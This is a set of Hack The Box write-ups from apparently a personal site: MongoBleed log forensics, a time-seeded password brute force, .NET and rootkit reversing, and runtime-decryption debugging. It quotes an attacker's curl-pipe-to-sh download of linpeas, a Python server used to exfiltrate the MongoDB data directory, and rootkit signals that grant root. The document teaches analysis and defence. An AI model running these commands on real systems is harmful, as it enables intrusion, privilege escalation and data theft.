What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?\nCVE-2025-14847 lets unauthenticated attackers leak heap memory from MongoDB Server by exploiting a trust issue in how it handles zlib-compressed network messages. That memory can contain cleartext credentials, API keys, session tokens and personally identifiable information (PII). An attacker only needs network access to the database\u0026rsquo;s default port, TCP/27017, to trigger it.\nThis vulnerability affects the following MongoDB versions:\nVersion 8.2: 8.2.0 – 8.2.2\nVersion 8.0: 8.0.0 – 8.0.16\nVersion 7.0: 7.0.0 – 7.0.27\nVersion 6.0: 6.0.0 – 6.0.26\nVersion 5.0: 5.0.0 – 5.0.31\nVersion 4.4: 4.4.0 – 4.4.29\nMongoDB version # 2. What is the version of MongoDB installed on the server that the CVE exploited? The \u0026#34;Build Info\u0026#34; line that mongod writes at startup gives the version, 8.0.16, which is the last release inside the affected 8.0.0 – 8.0.16 range:\n\u0026#34;Build Info\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;buildInfo\u0026#34;:{\u0026#34;version\u0026#34;:\u0026#34;8.0.16\u0026#34;,\u0026#34;gitVersion\u0026#34;:\u0026#34;ba70b6a13fda907977110bf46e6c8137f5de48...\nAttacker IP address # 3. Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE. The \u0026#34;Connection accepted\u0026#34; entries in the MongoDB log carry the remote address; the attacker\u0026rsquo;s IP is 65.0.76.43:\n\u0026#34;msg\u0026#34;:\u0026#34;Connection accepted\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;remote\u0026#34;:\u0026#34;65.0.76.43:35340\u0026#34;,\u0026#34;isLoadBalanced\u0026#34;:false,\u0026#34;uui...\nMalicious activity # 4. Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event). Exploitation began at 2025-12-29 05:25:52 UTC, when the server accepted the first connection from the attacker\u0026rsquo;s IP:\n{\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-12-29T05:25:52.743+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;NETWORK\u0026#34;, \u0026#34;id\u0026#34;:22943, \u0026#34;ctx\u0026#34;:\u0026#34;listener\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Connection accepted\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;remote\u0026#34;:\u0026#34;65.0.76.43:35340\u0026#34;,\u0026#34;i\n5. Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.\n$ grep -c \u0026#34;65.0.76.43\u0026#34; [root]/var/log/mongodb/mongod.log\n75260\ngrep -c counts lines rather than connections: every line that mentions the address is included, so the figure only equals the number of connections if each connection produced exactly one such line. Filtering on \u0026#34;Connection accepted\u0026#34; as well is the safer query. auth.log # 6. The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access? At 2025-12-29 05:40:03 UTC the attacker authenticated over SSH as mongoadmin from the same IP, as recorded in auth.log. keyboard-interactive/pam means a password was accepted rather than a key, consistent with credentials leaked through the MongoDB bug:\n2025-12-29T05:40:03.475659+00:00 ip-172-31-38-170 sshd[39962]: Accepted keyboard-interactive/pam for mongoadmin from 65.0.76.43 port 46062 ssh2\nmalicious script # 7. Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt. The .bash_history of the mongoadmin user shows the attacker piping linpeas.sh straight from GitHub into sh, i.e. running it without ever writing it to disk:\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\nThe full history:\nls -la\nwhoami\ncurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\ncd /data\ncd ~\nls -al\ncd /\nls\ncd /var/lib/mongodb/\nls -la\ncd ../\nwhich zip\napt install zip\nzip\ncd mongodb/\npython3\npython3 -m http.server 6969\nexit\nweb server for exfiltration # 8. The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target? The target was /var/lib/mongodb, the MongoDB data directory: the attacker listed it, tried to install zip to pack it, and then started python3 -m http.server 6969 from inside it, which serves the directory\u0026rsquo;s contents over HTTP for download.\n","date":"January 30, 2026","externalUrl":null,"permalink":"/investigations/htb-mongobleed/","section":"","summary":"","title":"HTB-MangoBleed","type":"investigations"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/mini-dump/","section":"Tags","summary":"","title":"Mini Dump","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/mongodb/","section":"Tags","summary":"","title":"Mongodb","type":"tags"},{"content":"","date":"January 30, 2026","externalUrl":null,"permalink":"/tags/windbg/","section":"Tags","summary":"","title":"WinDBG","type":"tags"},{"content":"","date":"January 29, 2026","externalUrl":null,"permalink":"/tags/elf/","section":"Tags","summary":"","title":"ELF","type":"tags"},{"content":" Difficulty: Medium OS: Linux Date: 2026-01-29 Description:\nA man named Michael Tanz bought 30 bitcoin in 2013 and stored it in his hardware wallet. He set the password for his hardware wallet through a password generator named \u0026ldquo;V1\u0026rdquo;. He remembers that his password is 20 characters long, and consisted of only alphanumeric characters and symbols. Michael however is not exactly sure of the date he generated the password - he knows it was between the 10th and the 11th of December 2013. 
Can you crack the password and help him recover his bitcoin ?\ninitial analysis # We are given two files:\n$ file *\ndecrypt.py: Python script, ASCII text executable\nV1: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7d0ef4ad0fae598a68cba943d3a34c96ad6461d2, for GNU/Linux 4.4.0, not stripped\ndecrypt.py decrypts an embedded AES-CBC message with a key we have to supply: the key is zero-padded to 32 bytes (AES-256), the first 16 bytes of the blob are the IV and the rest is PKCS7-padded ciphertext. The key is the password we need to recover.\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\n\ndef decrypt_message(encrypted_message, key):\n    try:\n        key = key.ljust(32, b\u0026#39;\\x00\u0026#39;)\n        iv = encrypted_message[:16]\n        ciphertext = encrypted_message[16:]\n        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n        decryptor = cipher.decryptor()\n        decrypted_padded_message = decryptor.update(ciphertext) + decryptor.finalize()\n        unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()\n        decrypted_message = unpadder.update(decrypted_padded_message) + unpadder.finalize()\n        return decrypted_message.decode()\n    except Exception as e:\n        print(f\u0026#34;An error occurred during decryption: {e}\u0026#34;)\n        return None\n\nif __name__ == \u0026#34;__main__\u0026#34;:\n    encrypted_message = bytes.fromhex(\u0026#39;ad24426047b0ffb03b679773664838462a6f00bdcaf0589dd1748e9ed5c568601edc87d974894f9dd9b98cc35535145c494eb0af84c8f78d440a033c91c7de62d506d8cabdc2a10138b95139bbe60e89\u0026#39;)\n    key = input(\u0026#34;Please input your key : \u0026#34;)\n    decrypted_message = decrypt_message(encrypted_message, key.encode())\n    if decrypted_message:\n        print(f\u0026#34;Decrypted message: {decrypted_message}\u0026#34;)\n    else:\n        print(\u0026#34;Decryption failed or no valid message found.\u0026#34;)\nRunning the generator itself gives nothing useful; the prompts are printed back to back and Generated password: stays empty whatever is answered:\n$ ./V1\nEnter len (max 50):\nInclude sym? (yes/no):yes\nInclude sym? (yes/no):\nInclude num? (yes/no):\nGenerated password:\n\n$ ./V1\nEnter len (max 50):\nInclude sym? (yes/no):no\nInclude sym? (yes/no):\nInclude num? (yes/no):\nGenerated password:\nreversing with ida # main does nothing of interest. In the function list I noticed an unused generate_password() function, so I analysed that instead.\nThe alphabet is \u0026quot;abcdefghijklmnopqrstuvwxyz\u0026quot; + \u0026quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026quot; + \u0026quot;!@#$%^\u0026amp;*_+\u0026quot; + \u0026quot;0123456789\u0026quot;, 72 characters in total:\nqmemcpy(v14, \u0026#34;abcdefghijklmnopqrstuvwxyz\u0026#34;, 26);\n// ...[snip]...\nstd::string::_M_append(\u0026amp;v14, \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026#34;, 26);\n// ...[snip]...\nstd::string::_M_append(\u0026amp;v14, \u0026#34;!@#$%^\u0026amp;*_+\u0026#34;, 10);\n// ...[snip]...\nstd::string::_M_append(\u0026amp;v14, \u0026#34;0123456789\u0026#34;, 10);\nThe generator seeds the C library\u0026rsquo;s rand() with the current local time, which makes the output a deterministic function of the timestamp and therefore brute-forceable. The seed is YYYYMMDDhhmmss packed as a decimal number: the odd constant 1410065408 is 10^10 reduced modulo 2^32 (srand() takes an unsigned int, so only the low 32 bits of the product survive), which means the value that reaches srand() is YYYYMMDDhhmmss mod 2^32:\nv6 = localtime(\u0026amp;timer);\nsrand(\n  100000000 * (v6-\u0026gt;tm_mon + 1)\n  + 1410065408 * (v6-\u0026gt;tm_year + 1900)\n  + 10000 * v6-\u0026gt;tm_hour\n  + v6-\u0026gt;tm_sec\n  + 100 * v6-\u0026gt;tm_min\n  + 1000000 * v6-\u0026gt;tm_mday);\nThe function then builds the password one character at a time: for a2 iterations (the password length) it picks a character from the alphabet with rand() % charset_length and appends it to the output string:\nif ( a2 \u0026gt; 0 )\n{\n  for ( i = 0; i != a2; ++i )\n  {\n    v9 = *(v14 + rand() % v15); // pick random char\n    // ... string manipulation to append v9 to result ...\n    *(*a1 + v10) = v9; // add char to password\n    a1[1] = v11; // update length\n    *(*a1 + v10 + 1) = 0; // null terminator\n  }\n}\nexploitation strategy # Since password generation is deterministic (same timestamp, same password), I can:\n- iterate through every second of 10 and 11 December 2013 (172800 candidates)\n- compute the seed for each timestamp\n- generate the 20-character password with C\u0026rsquo;s rand() under that seed\n- try AES decryption with that password\nI recreated the seed calculation and the generation loop in Python, calling the C library\u0026rsquo;s srand()/rand() through ctypes so the output matches the binary exactly. This has to run against glibc, because rand() differs between C libraries, and the seed is masked to 32 bits to mirror the binary\u0026rsquo;s unsigned int arithmetic:\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import padding\nimport ctypes\nfrom datetime import datetime, timedelta\n\ndef decrypt_message(encrypted_message, key):\n    try:\n        key = key.ljust(32, b\u0026#39;\\x00\u0026#39;)  # 20-byte password zero-padded to an AES-256 key, as decrypt.py does\n        iv = encrypted_message[:16]\n        ciphertext = encrypted_message[16:]\n        cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n        decryptor = cipher.decryptor()\n        decrypted_padded_message = decryptor.update(ciphertext) + decryptor.finalize()\n        unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()\n        decrypted_message = unpadder.update(decrypted_padded_message) + unpadder.finalize()\n        return decrypted_message.decode()\n    except Exception:\n        return None  # wrong key: the padding check or the UTF-8 decode fails\n\nlibc = ctypes.CDLL(None)  # glibc, the same rand() implementation the binary links against\nlibc.srand.argtypes = [ctypes.c_uint]\nlibc.rand.restype = ctypes.c_int\n\ndef pwd_gen(length, seed_value):\n    charset = \u0026#34;abcdefghijklmnopqrstuvwxyz\u0026#34; + \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ\u0026#34; + \u0026#34;!@#$%^\u0026amp;*_+\u0026#34; + \u0026#34;0123456789\u0026#34;\n    libc.srand(seed_value \u0026amp; 0xFFFFFFFF)  # srand() takes an unsigned int: mirror the binary\u0026rsquo;s 32-bit wrap\n    pwd = \u0026#34;\u0026#34;\n    for _ in range(length):\n        rand_val = libc.rand()\n        pwd += charset[rand_val % len(charset)]\n    return pwd\n\ndef seed_gen(year, month, day, hour, minute, second):\n    # same expression as the decompiled srand() argument, using struct tm conventions\n    return (100000000 * (month + 1) +\n            1410065408 * (year + 1900) +\n            10000 * hour +\n            second +\n            100 * minute +\n            1000000 * day)\n\nencrypted_message = bytes.fromhex(\u0026#39;ad24426047b0ffb03b679773664838462a6f00bdcaf0589dd1748e9ed5c568601edc87d974894f9dd9b98cc35535145c494eb0af84c8f78d440a033c91c7de62d506d8cabdc2a10138b95139bbe60e89\u0026#39;)\n\nstart = datetime(2013, 12, 10, 0, 0, 0)\nend = datetime(2013, 12, 11, 23, 59, 59)\n\nc = start\ncount = 0\n\nwhile c \u0026lt;= end:\n    seed = seed_gen(\n        c.year - 1900,  # struct tm stores years since 1900\n        c.month - 1,    # and months as 0..11\n        c.day,\n        c.hour,\n        c.minute,\n        c.second\n    )\n\n    pwd = pwd_gen(20, seed)\n\n    d = decrypt_message(encrypted_message, pwd.encode())\n\n    if d and d.isprintable():\n        print(f\u0026#34;Password: {pwd}\u0026#34;)\n        print(f\u0026#34;Decrypted message: {d}\u0026#34;)\n        break\n\n    count += 1\n    if count % 10000 == 0:\n        print(f\u0026#34;Checked {count} timestamps...\u0026#34;)\n\n    c += timedelta(seconds=1)\n$ python3 dec.py\nChecked 10000 timestamps...\nChecked 20000 timestamps...\nChecked 30000 timestamps...\nChecked 40000 timestamps...\nChecked 50000 timestamps...\nChecked 60000 timestamps...\nChecked 70000 timestamps...\nChecked 80000 timestamps...\nChecked 90000 timestamps...\nChecked 100000 timestamps...\nChecked 110000 timestamps...\nChecked 120000 timestamps...\nChecked 130000 timestamps...\nPassword: eWXtk*Oe%j5cof7Od08G\nDecrypted message: d 30 Bitcoins! , HTB{T1me_0n_the_B1t5_1386784885}\n","date":"January 29, 2026","externalUrl":null,"permalink":"/investigations/htb-wayback/","section":"","summary":"","title":"HTB-Wayback","type":"investigations"},{"content":"","date":"January 29, 2026","externalUrl":null,"permalink":"/tags/srand/","section":"Tags","summary":"","title":"Srand","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-28 Description:\nThe Client is in full control. 
Bypass the authentication and read the key to get the Flag.\ninitial analysis # The binary is a 32-bit .NET assembly, so it can be decompiled back to readable C# with dnSpy:\n$ file Bypass.exe\nBypass.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections\nRunning it only asks for a username and password and rejects whatever is typed, long inputs included:\nC:\\Users\\f\\Desktop\u0026gt;Bypass.exe\nEnter a username: hi\nEnter a password: hi\nWrong username and/or password\nEnter a username: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nEnter a password: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nWrong username and/or password\nEnter a username:\nreversing with dnspy # The code reads an embedded resource named \u0026quot;0\u0026quot; and passes its bytes to method 3 of class 7 (the obfuscator has stripped the real names). That method is an AES-CBC decryption with RijndaelManaged: the first 32 bytes of the resource are the key, the next 16 bytes are the IV, and everything after them is the ciphertext:\nbyte[] array = new byte[rijndaelManaged.Key.Length];\nbyte[] array2 = new byte[rijndaelManaged.IV.Length];\nmemoryStream.Read(array, 0, array.Length);\nmemoryStream.Read(array2, 0, array2.Length);\nsolution # Since the key and IV travel with the ciphertext, the resource decrypts itself. I saved it as 0.bin from dnSpy and reproduced the decryption in Python (the PKCS7 padding is left in place, which does not matter for reading the strings):\nfrom Crypto.Cipher import AES\n\nwith open(\u0026#34;0.bin\u0026#34;, \u0026#34;rb\u0026#34;) as f:\n    d = f.read()\n\nk_s = 32   # key length in bytes\niv_s = 16  # IV length in bytes\n\nkey = d[:k_s]\niv = d[k_s:k_s + iv_s]\nenc_d = d[k_s + iv_s:]\n\nc = AES.new(key, AES.MODE_CBC, iv)\ndec_d = c.decrypt(enc_d)\n\nwith open(\u0026#34;re.bin\u0026#34;, \u0026#39;wb\u0026#39;) as f:\n    f.write(dec_d)\n\nprint(\u0026#34;re.bin\\ndone\u0026#34;)\n$ python3 dec.py\nre.bin\ndone\n\n$ cat re.bin\n\u0026lt;Wrong username and/or password$Enter a username: $Enter a password: |ThisIsAReallyReallySecureKeyButYouCanReadItFromSourceSoItSucks:Please Enter the secret Key: 4Nice here is the Flag:HTB{}Wrong Key▒SuP3rC00lFL4g�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.�This executable has been obfuscated by using RustemSoft Skater .NET Obfuscator Demo version. Please visit RustemSoft.com for more information.\nThe decrypted blob is the program\u0026rsquo;s string table in the layout of the .NET #US heap: each string is stored as UTF-16 and preceded by its byte length, which is why a stray character precedes every readable string (0x3C, \u0026lt;, is 60 bytes for the 30-character \u0026ldquo;Wrong username and/or password\u0026rdquo;; 0x24, $, is 36 bytes for \u0026ldquo;Enter a username: \u0026rdquo;) and why the terminal shows the text without its NUL bytes. The flag is split across three entries, \u0026ldquo;Nice here is the Flag:HTB{\u0026rdquo;, \u0026ldquo;}\u0026rdquo; and \u0026ldquo;SuP3rC00lFL4g\u0026rdquo; (the ▒ is its 0x1A length byte), so the flag is HTB{SuP3rC00lFL4g}. The hard-coded \u0026ldquo;ThisIsAReallyReallySecureKeyButYouCanReadItFromSourceSoItSucks\u0026rdquo; sits right before \u0026ldquo;Please Enter the secret Key: \u0026rdquo; and is presumably the key the program asks for after a successful login.\n","date":"January 28, 2026","externalUrl":null,"permalink":"/investigations/htb-bypass/","section":"","summary":"","title":"HTB-Bypass","type":"investigations"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-28 Description:\nStatic analysis on this program didn\u0026rsquo;t reveal much. There must be a better way to approach this\u0026hellip;\ninitial analysis # We\u0026rsquo;re given a 64-bit ELF binary with a .ko extension (Kernel Object - a Linux Kernel Module).\n$ file diamorphine.ko\ndiamorphine.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV),\nBuildID[sha1]=e6a635e5bd8219ae93d2bc26574fff42dc4e1105, with debug_info, not stripped\nreversing with IDA # Since this is a Linux Kernel Module, there\u0026rsquo;s no standard main function. Instead, the entry point is the initialization function registered with module_init.\nThe module clears the write-protect bit (WP, bit 16) of the cr0 register so that it can write to the read-only page that holds sys_call_table.\nIn the sys_call_table, the following system calls are hooked and replaced with the rootkit\u0026rsquo;s own handlers:\n- kill → hacked_kill\n- getdents → hacked_getdents\n- getdents64 → hacked_getdents64\nhacked_kill func (priv esc and stealth) # When analyzing the hacked_kill function, we see it checks for signal number 64 (SIGRTMAX on Linux, so it does not collide with any ordinary signal):\nelse if ( (_DWORD)si == 64 )\n{\n  v9 = prepare_creds(pt_regs, a2, v2, di);\n  // ... [snip] ...\nThe function calls prepare_creds(), which creates a new credential structure for the current process. 
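A note for the response side before looking at the cred layout, as an added example that is not part of the original writeup: the signal-46 handler described further down only unlinks the module from the kernel's list of modules, which is what lsmod and /proc/modules read, while the module's sysfs directory under /sys/module survives (the writeup later finds the name there), and the getdents hooks filter enumeration only, so stat() and open() on a hidden name still succeed. Two checks built on those gaps, with sample data constructed for the example so it runs offline; the *_live variants run the same logic against a real Linux host:

```python
import os

# Constructed sample input, not taken from the challenge host: /proc/modules as it
# would read after `kill -46` unlinked the rootkit, and the /sys/module entries with
# whether each has an `initstate` file (only loadable modules get one; built-in code
# that merely exposes parameters also has a /sys/module directory).
SAMPLE_PROC_MODULES = """\
xfs 1556480 1 - Live 0xffffffffc0a00000
libcrc32c 16384 1 xfs, Live 0xffffffffc09f0000
"""
SAMPLE_SYS_MODULE = {
    "xfs": True,
    "libcrc32c": True,
    "diamorphine": True,   # loaded and unlinked from the list: visible in sysfs only
    "printk": False,       # built-in, never listed in /proc/modules: not suspicious
}


def parse_proc_modules(text: str) -> set:
    """Module names from /proc/modules (first column of each line)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def hidden_modules(proc_modules_text: str, sys_modules: dict) -> set:
    """Loadable modules present under /sys/module but missing from /proc/modules.
    Unlinking THIS_MODULE from the module list hides it from lsmod; it leaves sysfs alone."""
    listed = parse_proc_modules(proc_modules_text)
    return {name for name, loadable in sys_modules.items() if loadable and name not in listed}


def hidden_modules_live() -> set:
    """Run the module check against the live kernel (Linux only)."""
    with open("/proc/modules") as fh:
        text = fh.read()
    sys_modules = {
        name: os.path.exists(os.path.join("/sys/module", name, "initstate"))
        for name in os.listdir("/sys/module")
    }
    return hidden_modules(text, sys_modules)


def hidden_entries(listed, candidates, exists) -> set:
    """Candidate names that enumeration omits although a direct lookup succeeds.
    A getdents/getdents64 hook filters the listing only; stat() goes through the
    normal path walk and still resolves the name."""
    listed = set(listed)
    return {name for name in candidates if name not in listed and exists(name)}


def hidden_entries_live(dirpath: str, candidates) -> set:
    """Compare os.listdir (getdents64) with lstat-based existence for each candidate name."""
    return hidden_entries(
        os.listdir(dirpath),
        candidates,
        lambda name: os.path.lexists(os.path.join(dirpath, name)),
    )


if __name__ == "__main__":
    print("hidden modules (sample):", hidden_modules(SAMPLE_PROC_MODULES, SAMPLE_SYS_MODULE))
    # on the compromised host this would be: hidden_entries_live("/opt", ["psychosis"])
```

The directory check needs candidate names, because a getdents hook removes the entry before anything in user space sees it; a name from threat intel, from the binary's strings (psychosis here) or from a file-system image mounted elsewhere all work. A rootkit that also deletes its sysfs kobject defeats the module check, so treat a clean result as absence of this particular technique, not as a clean host.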
The credential structure in Linux looks like this (the field order matters for the offsets below):\nstruct cred {\n    atomic_t usage;   /* 4 bytes on this kernel, hence uid sits at offset 4 */\n    kuid_t uid;\n    kgid_t gid;\n    kuid_t suid;\n    kgid_t sgid;\n    kuid_t euid;\n    kgid_t egid;\n    kuid_t fsuid;\n    kgid_t fsgid;\n    // ... [snip] ...\n};\nThe rootkit then zeroes the eight 4-byte ID fields with four 8-byte writes starting at offset 4 (uid/gid, suid/sgid, euid/egid, fsuid/fsgid), i.e. sets every ID to 0 (root), and commits the new credentials, granting the calling process root privileges:\n// ... [snip] ...\n*(_QWORD *)(v9 + 4) = 0;\n*(_QWORD *)(v9 + 12) = 0;\n*(_QWORD *)(v9 + 20) = 0;\n*(_QWORD *)(v9 + 28) = 0;\ncommit_creds(v9);\nreturn 0;\nThe rootkit can hide itself from the module list by unlinking its own entry from the kernel\u0026rsquo;s doubly-linked list of modules when it receives signal number 46; the saved predecessor (module_previous) is what lets it re-insert itself later:\nif ( (_DWORD)si == 46 )\n{\n  if ( !module_hidden )\n  {\n    prev = _this_module.list.prev;\n    next = _this_module.list.next;\n    v6 = 0;\n    next-\u0026gt;prev = prev;\n    module_previous = prev;\n    prev-\u0026gt;next = next;\n    // ... [snip] ...\n    module_hidden = 1;\n    return v6;\n  }\nSending the same signal again while module_hidden is set unhides it.\nhacked_getdents func # This function first calls the original getdents and copies the returned directory listing (an array of linux_dirent structs) into a buffer.\nIt then scans the entries for names starting with \u0026ldquo;psychosis\u0026rdquo;: the 8-byte little-endian value 0x69736F6863797370 is the string \u0026ldquo;psychosi\u0026rdquo; and 115 (0x73) is the trailing \u0026ldquo;s\u0026rdquo;. Offset 18 is d_name inside linux_dirent (after the 8-byte d_ino, 8-byte d_off and 2-byte d_reclen) and 26 is d_name[8]:\nif ( *(_QWORD *)(v12 + 18) != 0x69736F6863797370LL ||\n     *((_BYTE *)buffer + v11 + 26) != 115 )\n    // ... [snip] ...\nIf it matches, the entry is removed from the buffer, hiding every file or directory whose name starts with \u0026ldquo;psychosis\u0026rdquo; from ls and anything else that enumerates directories.\nexploitation # With the rootkit analysis complete, I used its own features to escalate and then removed it from the compromised system:\n- escalate to root: kill -64 $$\n- unhide the module: kill -46 $$\n- remove the rootkit: rmmod diamorphine (the module name was found under /sys/module/, which the list unlinking does not touch)\n- find the hidden file:\n# find / -name \u0026#34;psychosis*\u0026#34; 2\u0026gt;/dev/null\n/opt/psychosis\n\n# cat /opt/psychosis/flag.txt\nHTB{N0w_Y0u_C4n_S33_m3_4nd_th3_r00tk1t_h4s_b33n_sUcc3ssfully_d3f34t3d!!}\n","date":"January 28, 2026","externalUrl":null,"permalink":"/investigations/htb-cyberpsychosis/","section":"","summary":"","title":"HTB-Cyberpsychosis","type":"investigations"},{"content":"","date":"January 28, 2026","externalUrl":null,"permalink":"/tags/lkm/","section":"Tags","summary":"","title":"LKM","type":"tags"},{"content":"","date":"January 28, 2026","externalUrl":null,"permalink":"/tags/rootkit/","section":"Tags","summary":"","title":"Rootkit","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-26 Description:\nStatic-Analysis on this program didn\u0026rsquo;t reveal much. 
There must be a better way to approach this\u0026hellip;\nStatic Analysis # The file is a 64-bit PE executable for Windows:\n$ file *\npartialencryption.exe: PE32+ executable for MS Windows 6.00 (console), x86-64, 5 sections\nPacker # The import table is small. VirtualAlloc / VirtualProtect / VirtualFree point to code being unpacked into memory at run time, and a few imports could serve anti-dynamic-analysis purposes:\n- IsDebuggerPresent - checks whether the process is running under a debugger\n- QueryPerformanceCounter and GetSystemTimeAsFileTime - can be used to time the gap between instructions and notice single-stepping\nOne caveat: this exact set (QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCurrentProcessId/ThreadId, IsDebuggerPresent, the RtlCaptureContext / RtlLookupFunctionEntry / RtlVirtualUnwind trio, InitializeSListHead, the exception-filter pair and IsProcessorFeaturePresent) is what every MSVC-built x64 binary imports for the CRT\u0026rsquo;s security-cookie initialisation and exception handling, so on its own it is weak evidence of deliberate anti-debugging.\nVirtualAlloc\nVirtualProtect\nVirtualFree\nQueryPerformanceCounter\nGetCurrentProcessId\nGetCurrentThreadId\nGetSystemTimeAsFileTime\nInitializeSListHead\nRtlCaptureContext\nRtlLookupFunctionEntry\nRtlVirtualUnwind\nIsDebuggerPresent\nUnhandledExceptionFilter\nSetUnhandledExceptionFilter\nIsProcessorFeaturePresent\nGetModuleHandleW\nKERNEL32.dll\nReversing # Static analysis showed the aeskeygenassist and aesdeclast instructions in use, which means the binary relies on the Intel AES-NI processor extensions for its cryptography:\n- aeskeygenassist helps expand the key into round keys on the fly\n- aesdeclast performs the final round of AES decryption on the state\nDynamic Analysis # just running # I tried running the program with arguments of different lengths; both were rejected (Nope for the short one, No for the longer one):\nC:\\Users\\f\\Desktop\u0026gt;partialencryption.exe aaaaaaaa\nNope\nC:\\Users\\f\\Desktop\u0026gt;partialencryption.exe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\nNo\nRunning over x64dbg # I placed a breakpoint on the VirtualAlloc call to identify where data is being written in memory. I set a hardware breakpoint on that address, resumed execution, but only received a Nope message. This indicated that a check was failing before the program jumped to the decrypted data.\nI then executed the program with a longer input string (e.g., aaa...) to observe its behavior under those conditions.\nIn this case, the program began checking individual characters of the flag.\n...[snip]...\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,48 | 48:\u0026#39;H\u0026#39;\n...[snip]...\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,54 | 54:\u0026#39;T\u0026#39;\n...[snip]...\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,42 | 42:\u0026#39;B\u0026#39;\n...[snip]...\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,7B | 7B:\u0026#39;{\u0026#39;\n...[snip]...\n| imul rcx,rcx,15 | rcx:putchar\n| mov rdx,qword ptr ss:[rsp+48] | rdx:exit\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,7D | 7D:\u0026#39;}}\u0026#39;\n...[snip]...\nEach block loads the argument pointer from the argument vector ([rdx+rax]), reads one byte of it at index rcx and compares it with a constant. This outer stage checks the HTB{ prefix and, via imul rcx,rcx,15, the closing } at index 0x15 = 21, which fixes the flag length at 22 characters (x64dbg prints the brace as }}). Continuing debugging, I found three identical blocks of code that handle decryption and execution:\n| mov r8d,8000 | ## MEM_RELEASE: free the previous stage\n| xor edx,edx |\n| mov rcx,qword ptr ss:[rsp+30] |\n| call qword ptr ds:[\u0026lt;VirtualFree\u0026gt;] |\n| xor eax,eax |\n| cmp eax,1 |\n| je partialencryption.7FF62E0F149A |\n| mov edx,1E0 | ## size 480 bytes\n| lea rcx,qword ptr ds:[7FF62E0F42E0] | ## encrypted data source\n| call partialencryption.7FF62E0F1050 | ## decrypts the payload into memory\n...[snip]...\n| call qword ptr ss:[rsp+58] | ## jumps directly to the start of that new decrypted code\nBy placing breakpoints on these dynamic call qword ptr ss:[rsp+??] instructions, we intercepted the decrypted logic for each stage.\ncall qword ptr ss:[rsp+58]:\n...[snip]...\n| mov rax,qword ptr ds:[rdx+rax] |\n| movsx eax,byte ptr ds:[rax+rcx] |\n| cmp eax,57 | 57:\u0026#39;W\u0026#39;\n...[snip]...\n| cmp eax,33 | 33:\u0026#39;3\u0026#39;\n...[snip]...\n| cmp eax,33 | 33:\u0026#39;3\u0026#39;\n...[snip]...\n| cmp eax,52 | 52:\u0026#39;R\u0026#39;\n...[snip]...\n| cmp eax,52 | 52:\u0026#39;R\u0026#39;\n...[snip]...\n| cmp eax,5F | 5F:\u0026#39;_\u0026#39;\nBy debugging the remaining two parts, I obtained the final flag: HTB{W3iRd_RUnT1m3_DEC}.\n","date":"January 26, 2026","externalUrl":null,"permalink":"/investigations/htb-partial_encryption/","section":"","summary":"","title":"HTB-Partial_Encryption","type":"investigations"},{"content":"","date":"January 26, 